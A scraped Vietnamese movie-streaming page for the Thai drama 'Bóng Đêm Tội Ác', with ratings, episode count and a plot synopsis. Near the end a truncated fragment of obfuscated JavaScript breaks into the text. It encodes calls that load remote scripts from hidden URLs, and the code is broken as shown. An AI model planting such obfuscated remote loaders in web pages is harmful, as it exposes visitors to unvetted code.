Banner C1

Phim

Bóng Đêm Tội Ác - Vtc9

Xem Phim Bóng Đêm Tội Ác
220332 lượt xem

22/22 Phim Tình Cảm Phim Thái Lan

Đạo Diễn: Đang cập nhật

Thời lượng: 22 Tập

Năm phát hành: 2013

Xem phimXem TrailerTải Phim

3.6
120 Star | 33 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Xem Phim Bóng Đêm Tội Ác tập 21 22 23: Nừng và Tee Yot kết hôn với nhau theo sự sắp đặt của gia đình chứ giữa họ không hề có tình yêu. Trong đêm thành hôn bạn gái cũ Nichada của Tee Yot đến xin làm vì chồng cô mới qua đời. Sự ở lại của cô đã tạo nên sóng gió cho cuộc đời của Nừng. Xem phim Bóng Đêm Tội Ác bắt đầu khi người giúp việc của Nừng cảnh báo cho cô ấy thấy sự bất chính của Nichada. Trong phòng của Nichada có một vali chứa đầy tiền và Nừng điều tra được thư ký của một chính trị gia vừa qua đời và mất số tiền là 50 triệu Bath.

Bóng Đêm Tội Ác

Nừng chưa kịp thông báo cho Tee Yot biết thì cô đã bị Nichada hãm hại. May mắn thoát chết và đổi quần áo với nạn nhân khác Nừng bắt đầu một cuộc sống khác đầy hoảng loạn. Xem phim Bóng Đêm Tội Ác Saarit là một cảnh sát, anh đã vô tình đụng Nừng khi cô ấy bỏ chạy từ đó anh bắt đầu điều tra sự việc khi biết Nừng có lí lịch với dấu đã chết. Liệu Nừng và Saarit có quay về nói lên sự thật hay Nừng sẽ sống với cuộc sống mới mà quên đi chuyện cũ? Chồng của Nừng sẽ như thế nào khi biết tin Nừng đã chết? Hãy tìm câu trả lời khi xem phim Bóng Đêm Tội Ác chiếu trên kênh Lets Viet.

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer Phim
7.2
33
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Bóng Đêm Tội Ác

Banner C1

User Online
Banner C1
Banner C1